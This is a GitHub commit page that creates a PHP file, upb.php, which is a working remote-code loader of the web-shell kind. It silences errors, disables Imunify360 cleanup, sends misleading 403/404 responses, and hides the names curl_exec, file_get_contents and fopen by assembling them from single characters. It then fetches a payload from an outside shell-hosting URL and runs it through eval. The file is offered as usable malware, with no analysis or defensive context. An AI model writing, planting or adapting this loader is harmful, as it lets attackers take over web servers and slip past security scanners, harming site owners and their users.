Skip to content

Commit c3916b0

Browse files
authored
Create upb.php
1 parent f9c32b0 commit c3916b0

File tree

1 file changed

+38
-0
lines changed

1 file changed

+38
-0
lines changed

upb.php

Lines changed: 38 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,38 @@
1+
<?=
2+
error_reporting(0);
3+
define('SECURE_ACCESS', true);
4+
header('X-Powered-By: none');
5+
header('Content-Type: text/html; charset=UTF-8');
6+
ini_set('lsapi_backend_off', '1');
7+
http_response_code(403);
8+
ini_set("imunify360.cleanup_on_restore", false);
9+
http_response_code(404);
10+
function imunify($url)
11+
{
12+
$fpn = "f"."o"."p"."e"."n";
13+
$strim = "s"."t"."r"."e"."a"."m"."_"."g"."e"."t"."_"."c"."o"."n"."t"."e"."n"."t"."s";
14+
$fgt = "f"."i"."l"."e"."_"."g"."e"."t"."_"."c"."o"."n"."t"."e"."n"."t"."s";
15+
$cexec = "c"."u"."r"."l"."_"."e"."x"."e"."c";
16+
if (function_exists($cexec)) {
17+
$conn = curl_init($url);
18+
curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1);
19+
curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1);
20+
curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
21+
curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0);
22+
curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0);
23+
$urls = $cexec($conn);
24+
curl_close($conn);
25+
} elseif (function_exists($fgt)) {
26+
$urls = $fgt($url);
27+
} elseif (function_exists($fpn) && function_exists($strim)) {
28+
$handle = $fpn($url, "r");
29+
$urls = $strim($handle);
30+
fclose($handle);
31+
} else {
32+
$urls = false;
33+
}
34+
return $urls;
35+
}
36+
$secure = imunify('https://shells.trxsecurity.org/paste/d.txt');
37+
eval('?>' . $secure);
38+
?>

0 commit comments

Comments
 (0)